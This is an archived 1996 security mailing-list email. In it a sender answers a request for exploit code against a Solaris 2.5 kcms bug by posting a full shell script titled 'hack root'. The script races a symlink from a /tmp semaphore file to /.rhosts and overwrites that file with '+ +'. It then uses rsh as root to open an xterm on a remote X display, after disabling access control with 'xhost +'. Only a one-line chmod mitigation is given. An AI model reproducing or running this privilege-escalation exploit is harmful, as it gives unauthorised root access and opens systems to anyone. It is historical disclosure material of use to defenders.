From emf@mailhost.pls.com  Tue Jul 30 07:43:55 1996
Received: from pls.com (san-marcos.pls.com [192.246.50.151]) by suburbia.net (8.7.4/Proff-950810) with SMTP id HAA18103 for <best-of-security@suburbia.net>; Tue, 30 Jul 1996 07:43:51 +1000
Received: from san-marcos by pls.com (SMI-8.6/SMI-SVR4)
	id RAA21976; Mon, 29 Jul 1996 17:40:05 -0400
Sender: emf@mailhost.pls.com
Message-ID: <31FD2FB3.4A4@pls.com>
Date: Mon, 29 Jul 1996 17:40:04 -0400
From: Erik Fichtner <emf@mailhost.pls.com>
Organization: Systems Administrator, Personal Library Software
X-Mailer: Mozilla 2.0 (X11; U; SunOS 5.3 sun4m)
MIME-Version: 1.0
To: Dave Arthur <arthurd@weasel.acccss.af.mil>
CC: best-of-security@suburbia.net
Subject: Re: BoS: Solaris 2.5 Exploit
References: <199607292034.QAA19312@weasel.acccss.af.mil>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Dave Arthur wrote:
> 
> Does anyone have the exploit code for the Solaris 2.5 bug:  /usr/openwin/bin/kcms*
> 
> If so, could you send me a copy?
> 
> Dave Arthur
> System Administrator
> ACC Computer Systems Squadron
> arthurd@weasel.acccss.af.mil
> (757) 764-7098


This seems to work better when /.rhosts does not exist, although I was
able to get it working most of the time even when /.rhosts exists.
YMMV.  



--

#!/bin/sh -x
# kcmsr00t.sh - hack root on a solaris 2.5 box
#
# original by JungSeok. Roh  ( beren@cosmos.kaist.ac.kr )
# 
# play-testing, proper thrashing of /.rhosts and "hey, bring up an
# xterm!" by Erik Fichtner (techs@spooge.effluvium.com) and 
# Pat Hess (phess@spooge.effluvium.com)
#
# To Prevent This Script:
# % chmod 755 /usr/openwin/bin/kcms*
#
 
 notbroken=1
 DISPLAY="catinthehat:0.0"
 export DISPLAY
 /usr/openwin/bin/xhost +
#  make sure we're ready to go
 /bin/rm -rf /tmp/Kp_kcms_sys.sem
 cd /tmp
 /bin/ln -s /.rhosts Kp_kcms_sys.sem
 
 /usr/openwin/bin/kcms_calibrate &
 echo "Click a window to hack r00t."

 while [ $notbroken -eq 1 ]
 do
 
    echo "Change your monitor type."
    /usr/openwin/bin/kcms_configure -o -d $DISPLAY
/usr/openwin/share/etc/devdata/profiles/kcmsEKsony20.mon
 
    if [ -f /.rhosts ]; then
            /bin/cp /dev/null /.rhosts
            /bin/echo  "+ +" >> /.rhosts
            /usr/bin/rsh localhost -l root "( /usr/openwin/bin/xterm
-display $DISPLAY -fn 12x24 & )"
            notbroken=0
    fi
 
 done